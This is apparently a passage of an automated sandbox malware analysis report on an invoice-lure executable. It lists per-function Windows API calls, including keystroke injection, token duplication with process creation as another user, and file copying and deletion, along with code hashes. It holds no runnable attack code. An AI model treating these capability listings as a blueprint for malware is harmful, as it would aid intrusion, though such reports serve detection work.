                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                              • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                              • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __lock_file
                              • String ID:
                              • API String ID: 3031932315-0
                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                              • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                              APIs
                              • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                              • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 040A5F21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2071448174.00000000040A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040A3000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40a3000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: 4a79813b16a0be769aae2b96dadf0e3ba4277a683ffc518e4a9296d5abefaf2d
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 90E0BF7494410DAFDB00EFA4D94969E7BB4EF04301F100561FD01A2281D63099609A62
                              APIs
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                              • GetKeyState.USER32(00000011), ref: 0047C92D
                              • GetKeyState.USER32(00000009), ref: 0047C936
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                              • GetKeyState.USER32(00000010), ref: 0047C953
                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                              • _wcsncpy.LIBCMT ref: 0047CA29
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                              • SendMessageW.USER32 ref: 0047CA7F
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                              • ImageList_SetDragCursorImage.COMCTL32(00AAE548,00000000,00000000,00000000), ref: 0047CB9B
                              • ImageList_BeginDrag.COMCTL32(00AAE548,00000000,000000F8,000000F0), ref: 0047CBAC
                              • SetCapture.USER32(?), ref: 0047CBB6
                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                              • ReleaseCapture.USER32 ref: 0047CC3A
                              • GetCursorPos.USER32(?), ref: 0047CC72
                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                              • SendMessageW.USER32 ref: 0047CD12
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                              • SendMessageW.USER32 ref: 0047CD80
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                              • GetCursorPos.USER32(?), ref: 0047CDC8
                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                              • GetParent.USER32(00000000), ref: 0047CDF7
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                              • SendMessageW.USER32 ref: 0047CE93
                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,02FE1AC0,00000000,?,?,?,?), ref: 0047CF1C
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                              • SendMessageW.USER32 ref: 0047CF6B
                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,02FE1AC0,00000000,?,?,?,?), ref: 0047CFE6
                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3100379633-4164748364
                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                              APIs
                              • GetForegroundWindow.USER32 ref: 00434420
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                              • IsIconic.USER32(?), ref: 0043444F
                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                              • SetForegroundWindow.USER32(?), ref: 0043446A
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 2889586943-2988720461
                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                              APIs
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                              • CloseHandle.KERNEL32(?), ref: 004463A0
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                              • GetProcessWindowStation.USER32 ref: 004463D1
                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                              • _wcslen.LIBCMT ref: 00446498
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _wcsncpy.LIBCMT ref: 004464C0
                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                              • CloseDesktop.USER32(?), ref: 0044657A
                              • SetProcessWindowStation.USER32(?), ref: 00446588
                              • CloseHandle.KERNEL32(?), ref: 00446592
                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                              • String ID: $@OH$default$winsta0
                              • API String ID: 3324942560-3791954436
                              • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                              • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Revised Invoice H000127896.exe,0040F545,C:\Users\user\Desktop\Revised Invoice H000127896.exe,004A90E8,C:\Users\user\Desktop\Revised Invoice H000127896.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • _wcscat.LIBCMT ref: 0044BD94
                              • _wcscat.LIBCMT ref: 0044BDBD
                              • __wsplitpath.LIBCMT ref: 0044BDEA
                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                              • _wcscpy.LIBCMT ref: 0044BE71
                              • _wcscat.LIBCMT ref: 0044BE83
                              • _wcscat.LIBCMT ref: 0044BE95
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                              • DeleteFileW.KERNEL32(?), ref: 0044BED3
                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                              • DeleteFileW.KERNEL32(?), ref: 0044BF15
                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                              • FindClose.KERNEL32(00000000), ref: 0044BF33
                              • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                              • FindClose.KERNEL32(00000000), ref: 0044BF7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                              • String ID: \*.*
                              • API String ID: 2188072990-1173974218
                              • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                              • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                              • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                              • FindClose.KERNEL32(00000000), ref: 00478924
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                              • __swprintf.LIBCMT ref: 004789D3
                              • __swprintf.LIBCMT ref: 00478A1D
                              • __swprintf.LIBCMT ref: 00478A4B
                              • __swprintf.LIBCMT ref: 00478A79
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                              • __swprintf.LIBCMT ref: 00478AA7
                              • __swprintf.LIBCMT ref: 00478AD5
                              • __swprintf.LIBCMT ref: 00478B03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 999945258-2428617273
                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscpy.LIBCMT ref: 004034A7
                              • _wcscat.LIBCMT ref: 004034BC
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                              • _wcscpy.LIBCMT ref: 004035A0
                              • _wcslen.LIBCMT ref: 00403623
                              • _wcslen.LIBCMT ref: 0040367D
                              Strings
                              • _, xrefs: 0040371C
                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                              • Unterminated string, xrefs: 00428348
                              • Error opening the file, xrefs: 00428231
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
